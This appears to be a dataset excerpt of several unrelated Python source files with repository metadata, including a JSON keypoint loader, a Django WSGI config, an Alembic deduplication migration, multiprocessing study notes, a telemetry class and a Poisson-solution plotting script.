Python
| false | false | 607 |
py
|
# -*- coding: utf-8 -*-
"""
Created on 2017 10.17
@author: liupeng
"""
import sys
import numpy as np
import json as js
class load_image_from_json(object):
def __init__(self, json_file):
self.json_file = json_file
def __del__(self):
pass
def js_load(self):
f = open(self.json_file, 'r')
js_data = js.load(f)
return js_data
if __name__ == "__main__":
all_data = load_image_from_json('0(6015).json').js_load()
for data in all_data:
print (data['image_id'])
print (data['keypoint']['human1'])
|
[
"[email protected]"
] | |
b35422cbf3d8501bfd9d006f2035134b3d022010
|
327a8fe2743bde7f49b19914e4d62091cb7c79d6
|
/upload/wsgi.py
|
d97d7643e5921ed05ee7ec9f48320185ec321262
|
[
"MIT"
] |
permissive
|
danrneal/raft-drf-exercise
|
3de78d115e02a3739911feb30e1b96f482b873e0
|
f62d2f05cd085f7a8d9b89f4ecee2c76feb4b47e
|
refs/heads/main
| 2023-08-03T17:04:14.583022 | 2021-09-22T19:53:08 | 2021-09-22T19:53:08 | 312,690,985 | 0 | 0 |
MIT
| 2021-09-22T19:53:09 | 2020-11-13T21:47:48 |
Python
|
UTF-8
|
Python
| false | false | 389 |
py
|
"""
WSGI config for upload project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'upload.settings')
application = get_wsgi_application()
|
[
"[email protected]"
] | |
d87050e9f0620d49c9b7e96014c4fa531605ba4a
|
64ab5b65afdf8d950c4b56ad2259133b95fc2fec
|
/zeus/migrations/e373a7bffa18_unique_build_failures.py
|
c118ddf8f86aee0ea630a9b38be70d3beae61969
|
[
"Apache-2.0"
] |
permissive
|
getsentry/zeus
|
3e88895443b23278fdb4c25121422ee214630512
|
6d4a490c19ebe406b551641a022ca08f26c21fcb
|
refs/heads/master
| 2023-09-01T14:20:11.396306 | 2021-04-30T17:08:33 | 2021-04-30T17:08:33 | 96,131,433 | 222 | 27 |
Apache-2.0
| 2022-06-01T03:17:16 | 2017-07-03T16:39:35 |
Python
|
UTF-8
|
Python
| false | false | 897 |
py
|
"""unique_build_failures
Revision ID: e373a7bffa18
Revises: 54bbb66a65a6
Create Date: 2020-03-13 09:25:38.492704
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = "e373a7bffa18"
down_revision = "54bbb66a65a6"
branch_labels = ()
depends_on = None
def upgrade():
# first we clean up duplicate rows
connection = op.get_bind()
connection.execute(
"""
DELETE FROM failurereason a
USING failurereason b
WHERE a.id > b.id
AND a.reason = b.reason
AND a.build_id = b.build_id
"""
)
op.create_index(
"unq_failurereason_buildonly",
"failurereason",
["build_id", "reason"],
unique=True,
postgresql_where=sa.text("job_id IS NULL"),
)
def downgrade():
op.drop_index("unq_failurereason_buildonly", table_name="failurereason")
|
[
"[email protected]"
] | |
a1ebf96d93a3e1ae78d6189b078630bb4fcf8d52
|
7f90f49237b30e404161b4670233d023efb7b43b
|
/第二章 python核心/HX02_linux系统编程/01进程/test/jc10_子进程多种方式小结.py
|
a42c62f02979b3b07ae8548d92ebb3d3b86fd1b6
|
[] |
no_license
|
FangyangJz/Black_Horse_Python_Code
|
c5e93415109699cc42ffeae683f422da80176350
|
34f6c929484de7e223a4bcd020bc241bb7201a3d
|
refs/heads/master
| 2020-03-23T01:52:42.069393 | 2018-07-14T12:05:12 | 2018-07-14T12:05:12 | 140,942,688 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 451 |
py
|
# !/usr/bin/env python
# -*- coding:utf-8 -*-
# author: Fangyang time:2018/3/31
# (1) fork, 只用于linux (不推荐)
ret = os.fork()
if ret == 0:
# 子进程
else:
# 父进程
# (2) Process(target=xxx), 还有一个 class Xxx(Process):
p1 = Process(target=func)
p1.start()
# 主进程也能干点活
# (3) pool (推荐)
pool = Pool(3)
pool.apply_async(xxxx)
# 主进程一般用来等待, 不干活, 真正的任务在子进程中执行
|
[
"[email protected]"
] | |
ac4b87c2ef8d46c4149984f849a04f5e20b3fc0e
|
600df3590cce1fe49b9a96e9ca5b5242884a2a70
|
/third_party/catapult/telemetry/telemetry/timeline/sample.py
|
806f60fafa2635a581485698ceee0eed38121471
|
[
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] |
permissive
|
metux/chromium-suckless
|
efd087ba4f4070a6caac5bfbfb0f7a4e2f3c438a
|
72a05af97787001756bae2511b7985e61498c965
|
refs/heads/orig
| 2022-12-04T23:53:58.681218 | 2017-04-30T10:59:06 | 2017-04-30T23:35:58 | 89,884,931 | 5 | 3 |
BSD-3-Clause
| 2022-11-23T20:52:53 | 2017-05-01T00:09:08 | null |
UTF-8
|
Python
| false | false | 713 |
py
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import telemetry.timeline.event as timeline_event
class Sample(timeline_event.TimelineEvent):
"""A Sample represents a sample taken at an instant in time
plus parameters associated with that sample.
NOTE: The Sample class implements the same interface as
Slice. These must be kept in sync.
All time units are stored in milliseconds.
"""
def __init__(self, parent_thread, category, name, timestamp, args=None):
super(Sample, self).__init__(
category, name, timestamp, 0, args=args)
self.parent_thread = parent_thread
|
[
"[email protected]"
] | |
a0d9c35a415b9dd7d28d35a0995ae5dc81209c6a
|
4dd1d8fa59e20061e2c12e540fc52b1b305e575b
|
/source/sims/s89/plt-exact-sol.py
|
0d82396776954a630e3f77a1be11e7c2991767ef
|
[
"MIT"
] |
permissive
|
ammarhakim/ammar-simjournal
|
f63521906a97d55ab290a5960d94758139944c89
|
5019f4723e20db80a20db6f2bd454c2fd3241412
|
refs/heads/master
| 2023-06-08T08:18:11.722779 | 2023-06-02T15:06:43 | 2023-06-02T15:06:43 | 204,050,516 | 3 | 3 | null | 2022-02-01T16:53:13 | 2019-08-23T18:28:44 |
Lua
|
UTF-8
|
Python
| false | false | 765 |
py
|
import pylab
import tables
import math
import numpy
def exactSol(a, b, X):
c0 = -(1/2.0 + a/12.0 + b/30.0)
c1 = 0.0
return X**2/2 + a*X**4/12 + b*X**6/30 + c0*X + c1
fh = tables.openFile("s89-poisson-o3-1d_phi.h5")
q = fh.root.StructGridField
nx, nc = q.shape
Xf = pylab.linspace(0, 1, nx)
qe = q[:,0]
dx = Xf[1]-Xf[0]
Xm = pylab.linspace(0.5*dx, 1-0.5*dx, nx-1)
qm = q[:-1,1]
a = 2.0
b = -12.0
Xhr = pylab.linspace(0, 1, 101)
fhr = exactSol(a, b, Xhr)
# make plot comparing exact to numerical solution
pylab.plot(Xhr, fhr, '-r', Xf, qe, 'ok', Xm, qm, 'ok')
# compute error
fex_e = exactSol(a, b, Xf)
fex_m = exactSol(a, b, Xm)
error = (numpy.abs(fex_e-qe).sum() + numpy.abs(fex_m-qm).sum())/(nx+nx-1);
print "%g %g" % (dx, error)
pylab.show()
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.